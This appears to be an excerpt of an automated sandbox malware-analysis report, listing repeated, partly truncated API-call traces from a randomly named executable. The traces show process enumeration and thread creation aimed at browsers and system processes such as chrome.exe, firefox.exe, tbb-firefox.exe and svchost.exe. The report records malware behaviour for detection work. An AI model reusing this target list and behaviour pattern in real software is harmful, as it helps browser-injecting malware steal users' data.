Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex25_2_01593610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex25_2_01593610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex27_2_00AF78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex27_2_00AF78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex27_2_00AF78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe27_2_00AF6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe27_2_00AF6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe27_2_00AF6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe27_2_00AF6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe27_2_00AF6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe27_2_00AF6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe27_2_00AF1900
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex27_2_00AE3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex27_2_00AE3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex27_2_00AE3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex29_2_012B78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex29_2_012B78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex29_2_012B78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe29_2_012B6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe29_2_012B6CA0
